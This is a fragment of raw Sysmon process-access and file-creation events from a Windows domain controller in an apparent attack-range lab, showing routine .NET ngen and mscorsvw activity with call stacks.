84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:36.485{59A5CD1D-913C-6005-3502-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13f0-0\PresentationFramework.Royale.dll2021-01-18 13:46:36.485 10341000x80000000000000006349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913C-6005-3502-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.220{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913C-6005-3502-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:36.220{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913C-6005-3502-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913C-6005-3402-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.141{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-913C-6005-3402-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.141{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913C-6005-3402-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:36.079{59A5CD1D-913B-6005-3302-00000000A301}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1294-0\PresentationFramework.Luna.dll2021-01-18 13:46:36.079 10341000x80000000000000006363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.907{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913D-6005-3902-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.891{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913D-6005-3902-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:37.891{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913D-6005-3902-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.782{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913D-6005-3802-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.782{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913D-6005-3802-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.782{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913D-6005-3802-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:37.688{59A5CD1D-913C-6005-3702-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12a4-0\PresentationUI.dll2021-01-18 13:46:37.688 10341000x80000000000000006386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.782{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-4002-00000000A301}2120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.782{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-4002-00000000A301}2120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:41.782{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-4002-00000000A301}2120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.641{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3F02-00000000A301}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.626{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3F02-00000000A301}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.626{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3F02-00000000A301}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3E02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.501{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3E02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:41.501{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3E02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:41.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3D02-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.407{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3D02-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:41.407{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3D02-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL